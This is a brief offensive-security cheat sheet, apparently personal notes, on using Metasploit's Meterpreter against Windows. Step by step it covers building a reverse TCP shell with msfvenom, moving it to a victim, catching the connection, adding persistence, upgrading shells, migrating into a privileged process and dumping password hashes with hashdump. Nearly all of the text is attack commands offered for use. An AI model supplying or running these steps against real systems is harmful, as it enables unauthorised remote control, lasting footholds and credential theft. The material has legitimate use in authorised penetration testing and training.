meterpreter

windows persistance module

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe

  2. transfer shell.exe to victim

  3. msfconsole

  4. use exploit/multi/handler

  5. set payload windows/meterpreter/reverse_tcp

  6. set LHOST and LPORT

  7. run

  8. background

  9. use exploit/windows/local/persistence

  10. set session 1

  11. run

Now if the shell drops for any reason you can catch it again by use exploit/multi/handler

upgrading a system shell to meterpreter shell

while on the regular system shell through meterpreter do ctrl+z to background it.

type sessions -u 1 which will upgrade the shell. then get back to the upgraded shell with sessions 2

migrate from to another process ID with better permissions

ps to view all the commands and who is running them

migrate $PID of the process permissions you want to use

dump all the hashes

hashdump

Last updated